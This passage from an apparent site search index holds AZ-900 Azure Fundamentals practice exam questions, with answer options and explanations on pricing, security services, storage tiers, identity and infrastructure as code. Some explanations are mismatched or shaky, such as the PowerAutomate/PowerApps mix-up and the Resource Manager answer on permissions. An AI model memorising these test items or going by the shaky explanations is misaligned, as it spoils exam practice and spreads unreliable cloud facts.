        • It is charged $0.05 per GB
        • It is charged $0.05 per TB
        • It is charged per hour of data transferred

        Bandwidth refers to data moving in and out of Azure data centres, as well as data moving between Azure data centres; other transfers are explicitly covered by the Content Delivery Network, ExpressRoute pricing or Peering. #### Question 8:\u00a0Correct

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-8-which-of-the-following-is-a-cloud-security-posture-management-cspm-and-cloud-workload-protection-platform-cwpp-for-all-of-your-azure-on-premises-and-multicloud-amazon-aws-and-google-gcp-resources","title":"Question 8: Which of the following is a Cloud Security Posture Management (CSPM) and Cloud Workload Protection Platform (CWPP) for all of your Azure, On-Premises, AND Multicloud (Amazon AWS and Google GCP) resources?","text":"
        • Microsoft Defender for Cloud
        • Azure DDoS Protection
        • Azure Front Door
        • Azure Key Vault
        • Azure Sentinel

        Microsoft Defender for Cloud is a Cloud Security Posture Management (CSPM) and Cloud Workload Protection Platform (CWPP) for all of your Azure, on-premises, and multicloud (Amazon AWS and Google GCP) resources. Defender for Cloud fills three vital needs as you manage the security of your resources and workloads in the cloud and on-premises:

        • Defender for Cloud secure score continually assesses\u00a0your security posture so you can track new security opportunities and precisely report on the progress of your security efforts. - Defender for Cloud recommendations secures\u00a0your workloads with step-by-step actions that protect your workloads from known security risks. - Defender for Cloud alerts defends\u00a0your workloads in real-time so you can react immediately and prevent security events from developing.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-9-which-of-the-following-is-a-key-benefit-of-using-role-based-access-control-rbac-over-traditional-access-control-methods","title":"Question 9:\u00a0Which of the following is a key benefit of using Role-Based Access Control (RBAC) over traditional access control methods?","text":"
        • RBAC supports a wider range of authentication protocols than traditional methods.
        • RBAC provides centralized management of user identities and access.
        • RBAC allows you to assign permissions to specific roles rather than individual users.
        • RBAC provides stronger encryption for sensitive data.

        Role-Based Access Control (RBAC)\u00a0is an approach to access control that allows you to manage user access based on the roles they perform within an organization. With RBAC, you can define a set of roles, each with a specific set of permissions, and then assign users to those roles.

        One of the key benefits of RBAC over traditional access control methods is that it allows you to assign permissions to specific\u00a0roles\u00a0rather than individual users. This means that when a user's role changes, their permissions can be automatically adjusted without the need for manual updates. This can help to streamline the process of managing access control and reduce the risk of errors or oversights.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-10-which-of-the-following-provides-support-for-key-migration-workloads-like-windows-sql-and-linux-server-databases-data-web-apps-and-virtual-desktops","title":"Question 10:\u00a0Which of the following provides support for key migration workloads like Windows, SQL and Linux Server, databases, data, web apps, and virtual desktops?","text":"
        • Azure Suggestions
        • Azure Recommendations
        • Azure Advisor
        • Azure Migrate

        Azure Migrate\u00a0provides all the Azure migration tools and guidance you need to plan and implement your move to the cloud\u2014and track your progress using a central dashboard that provides intelligent insights. Use a\u00a0comprehensive approach\u00a0to migrating your application and datacenter estate. Get support for key migration workloads like\u00a0Windows,\u00a0SQL\u00a0and\u00a0Linux Server, databases, data,\u00a0web apps, and virtual desktops. Migrate to destinations including Azure Virtual Machines, Azure VMware Solution, Azure App Service, and Azure SQL Database. Migrations are holistic across VMware, Hyper-V, physical server, and cloud-to-cloud migration.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-11-which-type-of-scaling-focuses-on-adjusting-the-capabilities-of-resources-such-as-increasing-processing-power","title":"Question 11: Which type of scaling focuses on adjusting the capabilities of resources, such as increasing processing power?","text":"
        • Static scaling
        • Vertical scaling
        • Elastic scaling
        • Horizontal scaling

        Vertical scaling involves adjusting the capabilities of resources, such as adding more CPUs or RAM to a virtual machine. It focuses on enhancing the capacity of individual resources. With horizontal scaling, if you suddenly experienced a steep jump in demand, your deployed resources could be scaled out (either automatically or manually). For example, you could add additional virtual machines or containers, scaling out. In the same manner, if there was a significant drop in demand, deployed resources could be scaled in (either automatically or manually), scaling in.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-12-what-is-the-default-action-for-a-network-security-rule-nsg-rule-if-no-other-action-is-specified","title":"Question 12:\u00a0 What is the default action for a Network Security Rule (NSG) rule if no other action is specified?","text":"
        • Allow
        • Block
        • Deny

        The default action for an NSG rule if no other action is specified is\u00a0DENY.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-13-what-is-the-primary-purpose-of-a-public-endpoint-in-azure","title":"Question 13:\u00a0What is the primary purpose of a public endpoint in Azure?","text":"
        • To prevent communication between virtual networks.
        • To enforce access control policies for resource groups.
        • To restrict incoming network traffic to specific IP ranges.
        • To provide a direct and secure connection to Azure services.

        A\u00a0public\u00a0endpoint in Azure allows resources to be accessed over the public internet. It's used to expose services to clients or users who are not within the same network as the resource. Public endpoints are commonly used for services that need to be accessed from anywhere, such as web applications.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-14-what-is-the-minimum-azure-ad-edition-required-to-enable-self-service-password-reset-for-users","title":"Question 14:\u00a0What is the minimum Azure AD edition required to enable self-service password reset for users?","text":"
        • Premium P2 edition
        • Premium P1 edition
        • Basic edition
        • Free edition

        The correct answer is - Premium P1 edition is the minimum required edition to enable self-service password reset for users in Azure AD. Reference: https://azure.microsoft.com/en-us/pricing/details/active-directory/

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-15-an-_____-is-a-collection-of-policy-definitions-that-are-grouped-together-towards-a-specific-goal-or-purpose-in-mind","title":"Question 15: An\u00a0 _____\u00a0 is a collection of policy definitions that are grouped together towards a specific goal or purpose in mind.","text":"
        • Azure Collection
        • Azure Initiative Correct)
        • Azure Group
        • Azure Bundle

        An\u00a0Azure initiative\u00a0is a collection of Azure policy definitions that are grouped together towards a specific goal or purpose in mind. Azure initiatives simplify management of your policies by grouping a set of policies together as one single item. For example, you could use the PCI-DSS built-in initiative which has all the policy definitions that are centered around meeting PCI-DSS compliance. Similar to Azure Policy, initiatives have\u00a0definitions\u00a0( a bunch of policies ) , assignments and parameters. Once you determine the definitions that you want, you would assign the initiative to a scope so that it can be applied.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-16-which-service-would-you-use-to-reduce-the-overhead-of-manually-assigning-permissions-to-a-set-of-resources","title":"Question 16:\u00a0Which service would you use to reduce the overhead of manually assigning permissions to a set of resources?","text":"
        • Azure Resource Manager
        • Azure Trust Center
        • Azure Policy
        • Azure Logic Apps

        Azure Resource Manager\u00a0is the deployment and management service for Azure. It provides a management layer that enables you to create, update, and delete resources in your Azure account. You use management features, like access control, locks, and tags, to secure and organize your resources after deployment.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-17-which-of-the-following-authentication-protocols-is-not-supported-by-azure-ad","title":"Question 17:\u00a0Which of the following authentication protocols is not supported by Azure AD?","text":"
        • OpenID Connect
        • NTLM
        • OAuth 2.0
        • SAML

        Azure AD does support SAML, OAuth 2.0, and OpenID Connect authentication protocols. However,\u00a0NTLM\u00a0is not supported by Azure AD. NTLM is a legacy authentication protocol that is not recommended for modern authentication scenarios due to its security limitations. Azure AD recommends using modern authentication protocols such as SAML, OAuth 2.0, and OpenID Connect, which provide stronger security and support features such as multi-factor authentication and conditional access. Therefore, the correct answer is NTLM.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-18-which-of-the-following-is-an-offline-tier-optimized-for-storing-data-that-is-rarely-accessed-and-that-has-flexible-latency-requirements","title":"Question 18:\u00a0Which of the following is an offline tier optimized for storing data that is rarely accessed, and that has flexible latency requirements?","text":"
        • Cool Tier
        • Infrequent Tier
        • Hot Tier
        • Archive Tier

        Data stored in the cloud grows at an exponential pace. To manage costs for your expanding storage needs, it can be helpful to organize your data based on how frequently it will be accessed and how long it will be retained. Azure storage offers different access tiers so that you can store your blob data in the most cost-effective manner based on how it's being used. Azure Storage access tiers include:

        • Hot tier\u00a0- An online tier optimized for storing data that is accessed or modified frequently. The Hot tier has the highest storage costs, but the lowest access costs.
        • Cool tier\u00a0- An online tier optimized for storing data that is infrequently accessed or modified. Data in the Cool tier should be stored for a minimum of 30 days. The Cool tier has lower storage costs and higher access costs compared to the Hot tier.
        • Archive tier\u00a0- An offline tier optimized for storing data that is rarely accessed, and that has flexible latency requirements, on the order of hours. Data in the Archive tier should be stored for a minimum of 180 days.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-19-___-brings-signals-together-to-make-decisions-and-enforce-organizational-policies-in-simple-terms-they-are-if-then-statements-if-a-user-wants-to-access-a-resource-then-they-must-complete-an-action","title":"Question 19:\u00a0___ brings signals together, to make decisions, and enforce organizational policies. In simple terms, they are if-then statements, if a user wants to access a resource, then they must complete an action.","text":"
        • Demand Access
        • Logical Access
        • Conditional Access
        • Active Directory Access

        The modern security perimeter now extends beyond an organization's network to include user and device identity. Organizations can use identity-driven signals as part of their access control decisions. Conditional Access brings signals together, to make decisions, and enforce organizational policies. Azure AD Conditional Access is at the heart of the new identity-driven control plane.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-20-which-of-the-following-services-can-you-use-to-calculate-your-estimated-hourly-or-monthly-costs-for-using-azure","title":"Question 20: Which of the following services can you use to calculate your estimated hourly or monthly costs for using Azure?","text":"
        • Azure Total Cost of Ownership (TCO)\u00a0calculator
        • Azure Pricing Calculator
        • Azure Calculator
        • Azure Cost Management

        You can use the\u00a0Azure Pricing Calculator\u00a0to calculate your estimated hourly or monthly costs for using Azure.\u00a0Azure TCO\u00a0on the other hand is primarily used to estimate the cost savings you can realize by migrating your workloads to Azure.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-21-which-of-the-following-protocols-is-used-for-federated-authentication-in-azure-ad","title":"Question 21:\u00a0Which of the following protocols is used for federated authentication in Azure AD?","text":"
        • LDAP
        • OpenID Connect
        • OAuth 2.0
        • SAML

        SAML (Security Assertion Markup Language)\u00a0is the protocol used for federated authentication in Azure AD. Federated authentication is a mechanism that allows users to use their existing credentials from a trusted identity provider (IdP) to authenticate with another application or service. In the context of Azure AD, federated authentication allows users to use their existing corporate credentials to authenticate with cloud-based applications and services. Azure AD supports several federated authentication protocols, including Security Assertion Markup Language (SAML), OAuth 2.0, and OpenID Connect. SAML is widely used for federated authentication in enterprise environments, while OAuth 2.0 and OpenID Connect are commonly used in web and mobile applications. Reference: https://docs.microsoft.com/en-us/azure/active-directory/develop/single-sign-on-saml-protocol

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-22-the-microsoft-_______-provides-a-variety-of-content-tools-and-other-resources-about-microsoft-security-privacy-and-compliance-practices","title":"Question 22: The Microsoft _______ provides a variety of content, tools, and other resources about Microsoft security, privacy, and compliance practices.","text":"
        • Privacy Policy
        • Blueprints
        • Service Trust Portal
        • Advisor

        The Microsoft Service Trust Portal provides a variety of content, tools, and other resources about Microsoft security, privacy, and compliance practices. The Service Trust Portal contains details about Microsoft's implementation of controls and processes that protect our cloud services and the customer data therein. To access some of the resources on the Service Trust Portal, you must log in as an authenticated user with your Microsoft cloud services account (Azure Active Directory organization account) and review and accept the Microsoft Non-Disclosure Agreement for Compliance Materials.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-23-which-of-the-following-can-help-you-automate-deployments-and-use-the-practice-of-infrastructure-as-code","title":"Question 23:\u00a0Which of the following can help you automate deployments and use the practice of infrastructure as code?","text":"
        • Mangement Groups
        • ARM\u00a0Templates
        • Azure Arc
        • Azure IaaC

        To implement infrastructure as code for your Azure solutions, use\u00a0Azure Resource Manager templates (ARM templates).\u00a0The template is a JavaScript Object Notation (JSON) file that defines the infrastructure and configuration for your project. The template uses declarative syntax, which lets you state what you intend to deploy without having to write the sequence of programming commands to create it. In the template, you specify the resources to deploy and the properties for those resources.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-24-yes-or-no-it-is-possible-to-deploy-a-new-azure-virtual-network-vnet-using-powerautomate-on-a-google-chromebook","title":"Question 24:\u00a0Yes or No: It is possible to deploy a new Azure Virtual Network (VNet) using PowerAutomate on a Google Chromebook.","text":"
        • No
        • Yes

        No, PowerApps is\u00a0not\u00a0a part of Azure!

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-25-___-is-a-unified-cloud-native-application-protection-platform-that-helps-strengthen-your-security-posture-enables-protection-against-modern-threats-and-helps-reduce-risk-throughout-the-cloud-application-lifecycle-across-multicloud-and-hybrid-environments","title":"Question 25: ___ is a unified cloud-native application protection platform that helps strengthen your security posture, enables protection against modern threats, and helps reduce risk throughout the cloud application lifecycle across multicloud and hybrid environments.","text":"
        • Azure Bastion
        • Azure Firewall
        • Microsoft Priva
        • Microsoft Defender for Cloud
        • Azure Network Security Group

        From the official documentation:\u00a0Microsoft Defender for Cloud is a unified cloud-native application protection platform that helps strengthen your security posture, enables protection against modern threats, and helps reduce risk throughout the cloud application lifecycle across multicloud and hybrid environments.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-26-__-infrastructure-as-code-involves-writing-scripts-in-languages-like-bash-or-powershell-you-explicitly-state-commands-that-are-executed-to-produce-a-desired-outcome","title":"Question 26:\u00a0__ Infrastructure as Code\u00a0involves writing scripts in languages like Bash or PowerShell. You explicitly state commands that are executed to produce a desired outcome.","text":"
        • Declarative
        • Imperative
        • Ad-Hoc
        • Defined

        There are two approaches you can take when implementing Infrastructure as Code.

        • Imperative Infrastructure as Code\u00a0involves writing scripts in languages like Bash or PowerShell. You explicitly state commands that are executed to produce a desired outcome. When you use imperative deployments, it's up to you to manage the sequence of dependencies, error control, and resource updates.
        • Declarative Infrastructure as Code\u00a0involves writing a definition that defines how you want your environment to look. In this definition, you specify a desired outcome rather than how you want it to be accomplished. The tooling figures out how to make the outcome happen by inspecting your current state, comparing it to your target state, and then applying the differences.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-27-which-of-these-approaches-is-not-a-cost-saving-solutions","title":"Question 27:\u00a0Which of these approaches is NOT a cost saving solutions?","text":"
        • Use Reserved Instances with Azure Hybrid
        • Load balancing the incoming traffic
        • Use the correct and appropriate instance size based on current workload
        • Making use of Azure Cost Management

        Load balancing is done to increase the overall availability of the application\u00a0not\u00a0to optimize costs.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-28-______-infrastructure-as-code-involves-writing-a-definition-that-defines-how-you-want-your-environment-to-look-in-this-definition-you-specify-a-desired-outcome-rather-than-how-you-want-it-to-be-accomplished","title":"Question 28: ______ Infrastructure as Code\u00a0involves writing a definition that defines how you want your environment to look. In this definition, you specify a desired outcome rather than how you want it to be accomplished.","text":"
        • Ad-Hoc
        • Imperative
        • Declarative
        • Defined
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-29-which-of-the-following-can-you-use-to-set-spending-thresholds","title":"Question 29:\u00a0Which of the following can you use to set spending thresholds?","text":"
        • Azure Cost Management +\u00a0Billing
        • Azure TCO
        • Azure Policy
        • Azure Pricing Calculator
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-30-which-of-the-following-azure-compliance-certifications-is-specifically-designed-for-the-healthcare-industry","title":"Question 30:\u00a0Which of the following Azure compliance certifications is specifically designed for the healthcare industry?","text":"
        • ISO 27001
        • GDPR
        • None of the above
        • HIPAA/HITECH
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-31-which-of-the-following-can-help-you-manage-multiple-azure-subscriptions","title":"Question 31:\u00a0Which of the following can help you manage multiple Azure Subscriptions?","text":"
        • Policies
        • Management Groups
        • Resource Groups
        • Blueprints

        Each management group contains one or more subscriptions. Azure arranges management groups in a single hierarchy. You define this hierarchy in your Azure Active Directory (Azure AD) tenant to align with your organization's structure and needs.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-32-in-the-_-as-a-service-cloud-service-model-customers-are-responsible-for-managing-applications-data-runtime-middleware-and-operating-systems-while-the-cloud-provider-manages-the-underlying-infrastructure","title":"Question 32:\u00a0In the _ as a Service cloud service model, customers are responsible for managing applications, data, runtime, middleware, and operating systems, while the cloud provider manages the underlying infrastructure.","text":"
        • Infrastructure
        • Platform
        • Software
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-33-when-a-blob-is-in-the-archive-access-tier-what-must-you-do-first-before-accessing-it","title":"Question 33:\u00a0When a blob is in the archive access tier, what must you do first before accessing it?","text":"
        • Rehydrate it
        • Modify its policy
        • Add it to a new resource group
        • Move it to File Storage
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-34-your-company-has-deployed-a-web-application-to-azure-and-you-want-to-restrict-access-to-it-from-the-internet-while-allowing-access-from-your-companys-on-premises-network-which-network-security-group-nsg-rule-would-you-configure","title":"Question 34:\u00a0Your company has deployed a web application to Azure, and you want to restrict access to it from the internet while allowing access from your company's on-premises network. Which Network Security Group (NSG) rule would you configure?","text":"
        • Inbound rule allowing traffic from any source to the web application's public IP address.
        • Inbound rule allowing traffic from your company's on-premises network to the web application's private IP address.
        • Outbound rule allowing traffic from any destination to your company's on-premises network.
        • Outbound rule allowing traffic from the web application's private IP address to any destination.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-35-which-of-the-following-can-help-you-download-cost-and-usage-data-that-was-used-to-generate-your-monthly-invoice","title":"Question 35:\u00a0Which of the following can help you download cost and usage data that was used to generate your monthly invoice?","text":"
        • Azure Monitor
        • Azure Cost Management
        • Azure Advisor
        • Azure Resource Manager

        Cost Management + Billing is a suite of tools provided by Microsoft that help you analyze, manage, and optimize the costs of your workloads. Using the suite helps ensure that your organization is taking advantage of the benefits provided by the cloud. You use Cost Management + Billing features to:

        • Conduct billing administrative tasks such as paying your bill
        • Manage billing access to costs
        • Download cost and usage data that was used to generate your monthly invoice
        • Proactively apply data analysis to your costs
        • Set spending thresholds
        • Identify opportunities for workload changes that can optimize your spending
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-36-____-asynchronously-replicates-the-same-applications-and-data-across-other-azure-regions-for-disaster-recovery-protection","title":"Question 36:\u00a0____ asynchronously replicates the same applications and data across other Azure regions for disaster recovery protection.","text":"
        • Cross-region replication
        • Auto-Region Replication
        • Auto-Region Replicas
        • Across-Region Replication

        Cross-region replication is one of several important pillars in the Azure business continuity and disaster recovery strategy. Cross-region replication builds on the synchronous replication of your applications and data that exists by using availability zones within your primary Azure region for high availability. Cross-region replication asynchronously replicates the same applications and data across other Azure regions for disaster recovery protection. Some Azure services take advantage of cross-region replication to ensure business continuity and protect against data loss. Azure provides several\u00a0storage solutions\u00a0that make use of cross-region replication to ensure data availability. For example,\u00a0Azure geo-redundant storage\u00a0(GRS) replicates data to a secondary region automatically. This approach ensures that data is durable even if the primary region isn't recoverable.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-37-you-want-to-ensure-that-all-virtual-machines-deployed-in-your-azure-environment-are-configured-with-specific-antivirus-software-which-azure-service-can-you-use-to-enforce-this-policy","title":"Question 37:\u00a0You want to ensure that all virtual machines deployed in your Azure environment are configured with specific antivirus software. Which Azure service can you use to enforce this policy?","text":"
        • Azure Security Center
        • Azure Policy
        • Azure Monitor
        • Azure Advisor
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-38-which-of-the-following-is-not-a-benefit-of-using-azure-arc","title":"Question 38:\u00a0Which of the following is NOT a benefit of using Azure Arc?","text":"
        • Centralized billing and cost management for all resources
        • Improved security and compliance for resources
        • Increased visibility and control over resources
        • Consistent management of resources across hybrid environments

        Azure Arc\u00a0is a hybrid management service that allows you to manage your servers, Kubernetes clusters, and applications across on-premises, multi-cloud, and edge environments. Some of the benefits of using Azure Arc include consistent management of resources across hybrid environments, improved security and compliance for resources, and increased visibility and control over resources. Centralized billing and cost management for all resources:\u00a0Thus is not a benefit of using Azure Arc. While Azure provides centralized billing and cost management for resources in the cloud, Azure Arc is focused on managing resources across hybrid environments and does not provide billing or cost management features.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-39-yes-or-no-in-a-public-cloud-model-you-get-dedicated-hardware-storage-and-network-devices-than-the-other-organizations-or-cloud-tenants","title":"Question 39:\u00a0Yes or No: In a Public Cloud model, you get dedicated hardware, storage, and network devices than the other organizations or cloud \u201ctenants\".","text":"
        • Yes
        • No
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-40-azure-pay-as-you-go-is-an-example-of-which-cloud-expenditure-model","title":"Question 40:\u00a0Azure Pay As you Go is an example of which cloud expenditure model?","text":"
        • Operational (OpEx)
        • Capital (CapEx)
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-41-which-of-the-following-endpoints-for-a-managed-instance-enables-data-access-to-your-managed-instance-from-outside-a-virtual-network","title":"Question 41:\u00a0Which of the following endpoints for a managed instance enables data access to your managed instance from outside a virtual network?","text":"
        • Hybrid
        • External
        • Private
        • Public

        Public endpoint for a\u00a0managed instance\u00a0enables data access to your managed instance from outside the\u00a0virtual network. You are able to access your managed instance from multi-tenant Azure services like Power BI, Azure App Service, or an on-premises network. By using the public endpoint on a managed instance, you do not need to use a VPN, which can help avoid VPN throughput issues.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-42-which-of-the-following-services-can-help-applications-absorb-unexpected-traffic-bursts-which-prevents-servers-from-being-overwhelmed-by-a-sudden-flood-of-requests","title":"Question 42:\u00a0Which of the following services can help applications absorb unexpected traffic bursts, which prevents servers from being overwhelmed by a sudden flood of requests?","text":"
        • Azure Decouple Storage
        • Azure Table Storage
        • Azure Queue Storage
        • Azure Message Storage

        Azure Queue Storage\u00a0is a service for storing large numbers of messages. You access messages from anywhere in the world via authenticated calls using HTTP or HTTPS. A queue message can be up to 64 KB in size. A queue may contain millions of messages, up to the total capacity limit of a storage account. Queues are commonly used to create a backlog of work to process asynchronously.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-43-in-which-scenario-would-you-use-the-business-to-business-b2b-collaboration-feature-in-azure-ad","title":"Question 43:\u00a0In which scenario would you use the Business-to-Business (B2B) collaboration feature in Azure AD?","text":"
        • Providing internal access to company reports.
        • Granting external vendors access to a shared project workspaces
        • Enabling employees to access internal applications.
        • Allowing customers to sign up for your e-commerce website.

        Business-to-Business (B2B) collaboration in Azure AD is used to collaborate with users external to your organization, such as vendors or partners. It allows you to securely share resources like documents and applications while maintaining control over access.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-44-which-of-the-following-best-describes-azure-arc","title":"Question 44:\u00a0Which of the following best describes Azure Arc?","text":"
        • A platform for building microservices-based applications that run across multiple nodes
        • A bridge that extends the Azure platform to help you build apps with the flexibility to run across datacenters
        • A service for analyzing and visualizing large datasets in the cloud
        • A cloud-based identity and access management service

        Azure Arc\u00a0is a service from Microsoft that allows organizations to manage and govern their on-premises servers, Kubernetes clusters, and applications using Azure management tools and services. With Azure Arc, customers can use Azure services such as Azure Policy, Azure Security Center, and Azure Monitor to manage their resources across on-premises, multi-cloud, and edge environments. Azure Arc also enables customers to deploy and manage Azure services on-premises or on other clouds using the same tools and APIs as they use in Azure.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-45-__-is-a-security-framework-that-uses-the-principles-of-explicit-verification-least-privileged-access-and-assuming-breach-to-keep-users-and-data-secure-while-allowing-for-common-scenarios-like-access-to-applications-from-outside-the-network-perimeter","title":"Question 45:\u00a0__ is a security framework that uses the principles of explicit verification, least privileged access, and assuming breach to keep users and data secure while allowing for common scenarios like access to applications from outside the network perimeter.","text":"
        • Least Trust
        • No Trust
        • Zero Trust
        • Less Trust
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-46-yes-or-no-it-is-possible-to-have-multiple-subscriptions-inside-a-management-group","title":"Question 46:\u00a0Yes or No: It is possible to have multiple Subscriptions inside a Management Group.","text":"
        • Yes
        • No
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-47-a-_______-endpoint-is-a-network-interface-that-uses-a-private-ip-address-from-your-virtual-network","title":"Question 47: A _______ endpoint is a network interface that uses a private IP address from your virtual network.","text":"
        • Public
        • Internal
        • Private
        • Hybrid

        A private endpoint\u00a0is a network interface that uses a private IP address from your virtual network. This network interface connects you privately and securely to a service that's powered by Azure Private Link. By enabling a private endpoint, you're bringing the service into your virtual network.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-48-you-are-the-lead-architect-of-your-organization-one-of-the-teams-has-a-requirement-to-copy-hundreds-of-tbs-of-data-to-azure-storage-in-a-secure-and-efficient-manner-the-data-can-be-ingested-one-time-or-an-ongoing-basis-for-archival-scenarios-which-of-the-following-would-be-a-good-solution-for-this-use-case","title":"Question 48:\u00a0You are the lead architect of your organization. One of the teams has a requirement to copy hundreds of TBs of data to Azure storage in a secure and efficient manner. The data can be ingested one time or an ongoing basis for archival scenarios. Which of the following would be a good solution for this use case?","text":"
        • Azure Data Lake Storage
        • Azure Cosmos DB
        • Azure File Sync
        • Azure Data Box
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-49-which-of-the-following-two-storage-solutions-are-built-to-handle-nosql-data","title":"Question 49:\u00a0Which of the following two storage solutions are built to handle NoSQL data?","text":"
        • Azure SQL\u00a0Database
        • Azure Table Storage
        • Azure NoSQL\u00a0Database
        • Azure Cosmos DB

        Azure Table storage\u00a0is a service that stores non-relational structured data (also known as structured NoSQL data) in the cloud, providing a key/attribute store with a schemaless design. Because Table storage is schemaless, it's easy to adapt your data as the needs of your application evolve. Azure Cosmos DB\u00a0is a fully managed NoSQL database for modern app development. Single-digit millisecond response times, and automatic and instant scalability, guarantee speed at any scale.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-50-which-of-the-following-services-can-host-the-following-type-of-apps-web-apps-api-apps-webjobs-mobile-apps","title":"Question 50:\u00a0Which of the following services can host the following type of apps: Web apps, API apps, WebJobs, Mobile apps","text":"
        • Azure App Service
        • Azure App Environment
        • Azure Bastion
        • Azure Arc
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-51-yes-or-no-subscriptions-can-be-moved-to-another-management-group-as-well-as-merged-into-one-single-subscription","title":"Question 51:\u00a0Yes or No: Subscriptions can be moved to another Management Group as well as merged into one Single subscription.","text":"
        • No
        • Yes

        Even though Subscriptions can be moved to another management group, they cannot be merged into 1 single subscription.

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-52-______-lets-you-extend-your-on-premises-networks-into-the-microsoft-cloud-over-a-private-connection-with-the-help-of-a-connectivity-provider","title":"Question 52:\u00a0______ lets you extend your on-premises networks into the Microsoft cloud over a private connection with the help of a connectivity provider.","text":"
        • Azure DNS
        • Azure Sentinel
        • Azure ExpressRoute
        • Azure Virtual Network
        • Azure Firewall
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-53-azure-cosmosdb-is-an-example-of-a-_______-offering","title":"Question 53:\u00a0Azure CosmosDB\u00a0is an example of a _______ offering.","text":"
        • Software as a Service (SaaS)
        • Platform as a Service (PaaS)
        • Infrastructure as a Service (IaaS)
        • Serverless Computing
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-54-yes-or-no-azure-cosmos-db-is-a-software-as-a-service-saas-offering-from-microsoft-azure","title":"Question 54:\u00a0Yes or No: Azure Cosmos DB is a\u00a0Software as a Service (SaaS)\u00a0offering from Microsoft Azure.","text":"
        • No, it is a PaaS\u00a0offering.
        • No, it is an IaaS\u00a0offering.
        • Yes, it is a SaaS\u00a0offering.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-55-which-of-the-following-is-the-foundation-for-building-enterprise-data-lakes-on-azure-and-is-built-on-top-of-azure-blob-storage","title":"Question 55: Which of the following is the foundation for building enterprise data lakes on Azure AND\u00a0is built on top of Azure Blob storage?","text":"
        • Azure Data Lake Storage Gen4
        • Azure Data Lake Storage Gen3
        • Azure Data Lake Storage Gen1
        • Azure Data Lake Storage Gen2

